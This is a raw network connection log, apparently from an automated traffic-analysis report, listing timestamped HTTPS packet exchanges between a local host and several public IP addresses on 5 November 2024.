                                                                                                                                    Nov 5, 2024 09:02:37.631582975 CET49767443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:02:37.631620884 CET44349767188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:37.631727934 CET49767443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:02:37.631899118 CET49767443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:02:37.631916046 CET44349767188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:38.244293928 CET44349767188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:38.269830942 CET49767443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:02:38.269845963 CET44349767188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:38.270931959 CET44349767188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:38.273699999 CET49767443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:02:38.286030054 CET49767443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:02:38.286101103 CET44349767188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:38.289756060 CET49767443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:02:38.331335068 CET44349767188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:38.344110012 CET49767443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:02:38.344116926 CET44349767188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:38.393994093 CET49767443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:02:38.945239067 CET44349767188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:38.945331097 CET44349767188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:38.945383072 CET49767443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:02:38.946547985 CET49767443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:02:38.946558952 CET44349767188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:39.011349916 CET49768443192.168.2.4188.114.97.3
                                                                                                                                    Nov 5, 2024 09:02:39.011394978 CET44349768188.114.97.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:39.011581898 CET49768443192.168.2.4188.114.97.3
                                                                                                                                    Nov 5, 2024 09:02:39.012129068 CET49768443192.168.2.4188.114.97.3
                                                                                                                                    Nov 5, 2024 09:02:39.012142897 CET44349768188.114.97.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:39.611931086 CET44349768188.114.97.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:39.618005037 CET49768443192.168.2.4188.114.97.3
                                                                                                                                    Nov 5, 2024 09:02:39.618030071 CET44349768188.114.97.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:39.618913889 CET44349768188.114.97.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:39.618995905 CET49768443192.168.2.4188.114.97.3
                                                                                                                                    Nov 5, 2024 09:02:39.620534897 CET49768443192.168.2.4188.114.97.3
                                                                                                                                    Nov 5, 2024 09:02:39.620588064 CET44349768188.114.97.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:39.620803118 CET49768443192.168.2.4188.114.97.3
                                                                                                                                    Nov 5, 2024 09:02:39.620810032 CET44349768188.114.97.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:39.666352987 CET49768443192.168.2.4188.114.97.3
                                                                                                                                    Nov 5, 2024 09:02:40.293045044 CET44349768188.114.97.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:40.293138981 CET44349768188.114.97.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:40.293189049 CET49768443192.168.2.4188.114.97.3
                                                                                                                                    Nov 5, 2024 09:02:40.294176102 CET49768443192.168.2.4188.114.97.3
                                                                                                                                    Nov 5, 2024 09:02:40.294198036 CET44349768188.114.97.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:00.093142033 CET49769443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:00.093173027 CET44349769188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:00.093295097 CET49769443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:00.093611002 CET49769443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:00.093625069 CET44349769188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:00.705338955 CET44349769188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:00.705600977 CET49769443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:00.705619097 CET44349769188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:00.706607103 CET44349769188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:00.706903934 CET49769443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:00.707031012 CET49769443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:00.707031012 CET49769443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:00.707104921 CET44349769188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:00.707133055 CET49769443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:00.707266092 CET44349769188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:00.707329988 CET49770443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:00.707333088 CET49769443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:00.707367897 CET44349770188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:00.707377911 CET49769443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:00.707484007 CET49770443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:00.707741976 CET49770443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:00.707756042 CET44349770188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:01.048459053 CET49736443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:03:01.048499107 CET4434973654.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:01.318691969 CET44349770188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:01.319056034 CET49770443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:01.319076061 CET44349770188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:01.319364071 CET44349770188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:01.319652081 CET49770443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:01.319709063 CET44349770188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:01.319911003 CET49770443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:01.367335081 CET44349770188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:01.765520096 CET44349770188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:01.765615940 CET44349770188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:01.765798092 CET49770443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:01.766249895 CET49770443192.168.2.4188.114.96.3
                                                                                                                                    Nov 5, 2024 09:03:01.766267061 CET44349770188.114.96.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:09.210810900 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:09.210839987 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:09.210910082 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:09.211201906 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:09.211215973 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:09.984510899 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:09.984591961 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:09.986011028 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:09.986016989 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:09.986340046 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:09.994002104 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:10.035330057 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.264489889 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.264518976 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.264539003 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.264663935 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:10.264663935 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:10.264679909 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.265799046 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:10.383503914 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.383527994 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.383579969 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:10.383601904 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.383651018 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:10.383702993 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:10.502377033 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.502401114 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.502476931 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:10.502476931 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:10.502499104 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.502562046 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:10.622538090 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.622561932 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.622657061 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:10.622657061 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:10.622663975 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.622764111 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:10.741015911 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.741040945 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.741148949 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:10.741148949 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:10.741158009 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.741409063 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:10.859707117 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.859735966 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.859817982 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:10.859827042 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.860213995 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:10.977904081 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.977931023 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.977981091 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:10.977996111 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:10.978024006 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:10.978045940 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.021037102 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.021056890 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.021119118 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.021126986 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.021169901 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.140064955 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.140085936 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.140175104 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.140182972 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.140223026 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.257564068 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.257586956 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.257647038 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.257654905 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.257692099 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.257709980 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.335154057 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.335170031 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.335266113 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.335274935 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.335319042 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.429038048 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.429055929 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.429127932 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.429135084 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.429177999 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.496423006 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.496438980 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.496498108 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.496505976 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.496545076 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.497000933 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.497064114 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.497070074 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.497081041 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.497109890 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.497118950 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.497131109 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.497178078 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.497184992 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.497214079 CET49772443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.497217894 CET4434977213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.550134897 CET49774443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.550149918 CET4434977413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.550210953 CET49773443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.550223112 CET49774443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.550251007 CET4434977313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.550306082 CET49773443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.551261902 CET49774443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.551273108 CET4434977413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.551552057 CET49773443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.551573992 CET4434977313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.552545071 CET49775443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.552553892 CET4434977513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.552706957 CET49775443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.552910089 CET49775443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.552916050 CET4434977513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.554385900 CET49776443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.554419041 CET4434977613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.554475069 CET49776443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.555028915 CET49776443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.555041075 CET4434977613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.555986881 CET49777443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.556010962 CET4434977713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:11.556246042 CET49777443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.557457924 CET49777443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:11.557472944 CET4434977713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.300282955 CET4434977513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.300725937 CET49775443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.300744057 CET4434977513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.301227093 CET49775443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.301230907 CET4434977513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.304495096 CET4434977713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.304833889 CET49777443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.304851055 CET4434977713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.305346012 CET49777443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.305351973 CET4434977713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.320858002 CET4434977413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.321285009 CET49774443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.321300983 CET4434977413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.322117090 CET4434977313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.322321892 CET49774443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.322326899 CET4434977413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.322592974 CET49773443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.322604895 CET4434977313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.323016882 CET49773443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.323019981 CET4434977313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.345624924 CET4434977613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.345932007 CET49776443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.345958948 CET4434977613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.346313000 CET49776443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.346318007 CET4434977613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.437052011 CET4434977513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.437071085 CET4434977513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.437120914 CET4434977513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.437124014 CET49775443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.437160969 CET49775443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.437453985 CET49775443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.437469006 CET4434977513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.437479019 CET49775443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.437484980 CET4434977513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.440397024 CET49779443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.440404892 CET4434977913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.440572023 CET49779443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.440771103 CET49779443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.440782070 CET4434977913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.441020966 CET4434977713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.441323042 CET4434977713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.441370010 CET49777443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.441395044 CET49777443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.441401005 CET4434977713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.441411018 CET49777443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.441415071 CET4434977713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.443295956 CET49780443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.443321943 CET4434978013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.443492889 CET49780443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.443610907 CET49780443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.443622112 CET4434978013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.459547997 CET4434977413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.459609985 CET4434977413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.459666014 CET49774443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.459773064 CET49774443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.459780931 CET4434977413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.459789991 CET49774443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.459794998 CET4434977413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.461652040 CET49781443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.461661100 CET4434978113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.461718082 CET49781443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.461834908 CET49781443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.461846113 CET4434978113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.462492943 CET4434977313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.462513924 CET4434977313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.462555885 CET49773443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.462564945 CET4434977313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.462641001 CET4434977313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.462687016 CET49773443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.463259935 CET49773443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.463267088 CET4434977313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.463274002 CET49773443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.463278055 CET4434977313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.465785980 CET49782443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.465795040 CET4434978213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.465842962 CET49782443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.466036081 CET49782443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.466046095 CET4434978213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.488919020 CET4434977613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.488939047 CET4434977613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.488986969 CET4434977613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.488987923 CET49776443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.489037037 CET49776443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.489208937 CET49776443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.489222050 CET4434977613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.489247084 CET49776443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.489252090 CET4434977613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.491131067 CET49783443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.491141081 CET4434978313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:12.491406918 CET49783443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.491539955 CET49783443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:12.491553068 CET4434978313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.206933975 CET4434977913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.207407951 CET49779443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.207432985 CET4434977913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.207902908 CET49779443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.207909107 CET4434977913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.227535009 CET4434978213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.228929996 CET49782443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.228929996 CET49782443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.228946924 CET4434978213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.228956938 CET4434978213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.233160973 CET4434978113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.233901024 CET49781443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.233901024 CET49781443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:13.233922958 CET4434978113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.233930111 CET4434978113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:13.246028900 CET4434978013.107.253.45192.168.2.4
